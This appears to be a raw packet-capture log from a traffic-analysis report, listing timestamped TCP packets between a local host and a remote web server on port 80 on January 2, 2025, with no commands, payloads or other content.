                                                                            Jan 2, 2025 20:34:53.004067898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004079103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004081964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.004091024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004101992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004107952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.004112005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004143953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.006362915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006381989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006392956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006402969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006414890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006424904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.006426096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006438017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006448984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.006455898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.006495953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.009212017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009227037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009243965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009253979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009265900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009277105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009289026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009298086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.009304047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.009331942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.014790058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014803886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014821053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014832020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014843941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014854908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014914989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014916897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.014933109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014940977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.014945030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014955044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014972925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014977932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.014983892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014993906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.014996052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.015003920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.015014887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.015028954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.015042067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.015057087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.015075922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.015927076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.015973091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.016000032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016010046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016021967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016028881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.016037941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016048908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.016048908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016060114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016072035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.016086102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.016102076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017011881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017055988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017057896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017072916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017082930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017083883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017095089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017100096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017117023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017122030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017127991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.017149925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.017177105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087059021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087101936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087122917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087135077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087141991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087146044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087157011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087167978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087172031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087179899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087189913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087199926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087212086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087223053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087233067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087251902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087270021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087280035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087290049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087301016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087318897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087321043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087327003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087331057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087344885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087347984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087359905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087366104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087371111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087382078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087397099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087399960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087408066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087414980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087419033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087433100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087474108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087493896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087505102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087515116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087538958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087554932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087575912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087599993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087616920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087627888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087637901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087639093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087650061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087661982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087666988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087671995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087692022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087713957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087744951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087755919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087768078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087790012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087805033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087810993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087822914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087832928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087843895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087851048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087857008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087865114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087897062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087914944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087935925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087977886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.087980986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.087990999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088001966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088018894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088033915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088057995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088068962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088093042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088104963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088114977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088114977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088128090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088140965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088157892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088170052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088180065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088186979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088207006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088218927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088375092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088386059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088402033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088412046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088418007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088423967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088434935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088445902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088449001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088455915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088468075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.088469028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088490009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.088531971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.090863943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090883970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090895891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090905905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090917110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090928078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090936899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.090939045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090943098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.090949059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.090975046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.090986013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.093053102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093075991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093087912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093099117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093110085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093112946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.093127012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093136072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.093139887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093172073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.093175888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.093184948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.093214035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.096124887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096138000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096149921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096168995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096179008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096183062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.096190929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096201897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.096204042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.096241951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101589918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101612091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101624012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101634979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101644039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101645947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101656914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101667881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101675987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101677895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101691961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101716995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101735115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101742029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101752043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101762056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101773024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101788044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101810932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101815939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101821899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101833105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101841927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.101846933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.101876974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.102891922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102901936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102912903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102924109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102935076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102946043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.102951050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102967024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102978945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.102986097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.103014946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.103838921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103851080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103862047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103877068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103887081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103888035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.103898048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103909969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103919029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.103924990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.103945017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.103961945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174104929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174143076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174154997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174164057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174168110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174179077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174195051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174200058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174212933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174223900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174233913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174245119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174253941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174254894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174264908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174273968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174276114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174289942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174300909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174314976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174325943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174336910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174348116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174360037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174370050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174381018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174386024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174397945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174408913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174412966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174418926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174431086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174439907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174451113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174458981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174460888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174470901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174482107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174487114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174490929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174501896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174510956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174513102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174524069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174540043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174540043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174561024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174566031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174572945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174582958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174592972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174602985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174607992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174613953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174624920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174631119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174649954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174670935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174674988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174710035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174782038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174798965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174809933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174820900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174823046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174834967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174843073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174848080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174877882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174896955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174942017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174957991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174968958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174978971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.174988985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.174989939 CET804973047.254.187.72192.168.2.4
